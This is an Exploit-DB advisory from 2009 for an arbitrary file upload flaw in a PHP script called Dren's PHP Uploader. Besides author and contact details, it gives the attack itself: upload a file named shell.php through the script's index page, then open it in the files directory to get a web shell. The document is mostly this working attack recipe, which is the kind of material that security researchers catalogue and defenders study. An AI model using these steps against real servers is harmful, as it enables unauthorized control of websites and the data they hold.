Dren's PHP Uploader - Arbitrary File Upload

EDB-ID:

10763

CVE:

N/A




Platform:

PHP

Date:

2009-12-28


Dren's PHP Uploader Remote File Upload Vulnerability

####################################################################################
# [+] Author : Cyb3r IntRue #
# [+]Email : r0ot@live.ru<mailto:r0ot@live.ru> & v7a@hotmail.fr<mailto:v7a@hotmail.fr> #
# [+] Date : 29/12/2009 #
# [+] Software Link : http://freewebtown.com/thanigga/Dren's%20PHP%20Uploader.rar #
# [+] Team : Avengers Team #
# [+] Dork : n/a #
####################################################################################

The exploit :

http://localhost/path/index.php


Upload shell.php ^^



Get now shell :

http://localhost/path/files/shell.php



Thanks to : HAQIQ20

#####################################################